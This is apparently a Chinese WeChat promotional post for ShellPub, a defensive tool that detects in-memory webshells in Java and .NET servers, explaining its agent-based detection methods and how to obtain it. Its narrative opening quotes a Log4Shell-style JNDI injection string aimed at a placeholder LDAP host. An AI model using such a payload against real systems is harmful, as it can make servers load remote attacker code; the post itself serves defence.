这是七月最后一天,与往日并无不同,
同样的桑拿天,同样的炎热。
并不平常,因为你在等一个信号。
虽素未蒙面,但你知道他会来。
信息大屏上各种数据不断更新,一切都显得那么平静。
旁边小哥泡面的香味,引起一阵进食的欲望。
但你只看了一眼桌角贴着的便签,记录着最新的漏洞信息:
就让你抢个先手,但也暴露了你的招式
一年了,你的内存马攻击可有新的变化?
${jndi:ldap://xxxx.com.cn}也接我一招,专破内存马!
“重启吧。”你关掉ssh终端,对旁边的甲方小哥说。
“你刚刚用的是ShellPub吗?”
你转过头去,认真地说:“ShellPub,是的,但我更喜欢叫它——河马!”
ShellPub,河马内存马检测工具正式公测:
► Linux版,专用于Java类内存马检测
-
自动识别包括Tomcat、Weblogic、Jboss 环境; -
Spring等打包环境支持手动指定进程方式,因此第三方Java应用(gitlab,ES)都可以检测;
► Windows版
-
Java内存马检测, Java6+; OA系统、办公系统; -
Net内存马,IIS等场景下的.net内存马检测。
全面覆盖内存马常见场景,可检测冰蝎、哥斯拉等内存马利用工具注入的内存马。
河马是如何检测内存马的?
但关于在哪儿检测恶意代码,目前有两种方式:
► 在内存中检测
这种方法是将检测的agent注入内存中,Hook关键的类,无论内存马是动态注册,还是基于agent修改字节码,都可以预先被检测agent感知到,然后运行检测代码。
► 在内存中找,在硬盘上检测
同样是使用agent技术,进入目标JVM中,遍历筛选可疑的类,然后dump到硬盘,将类字节码反编译为Java代码后,再进行恶意代码检测。
相比前一种检测方法,这种方法相对比较温和,对正常业务的侵入性较弱。
ShellPub河马当前既支持Agent方式检测,也支持无Agent方式检测。
如何获取内存马检测工具:
-
关注SHELLPUB公众号
-
在后台回复【winmem】获取Windows内存马检测工具
-
在后台回复【linuxmem】获取Linux内存马检测工具
获取工具后会得到我们的交流群密码,群里有开发小哥哥为你处理BUG,也有专门的分析师帮你分析内存马样本!
点击下方名片,关注我们
如果不想错过消息,可以星标 
原文始发于微信公众号(这里是河马):内存马专杀开放下载 | 当杀疯了的内存马遇到河马
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论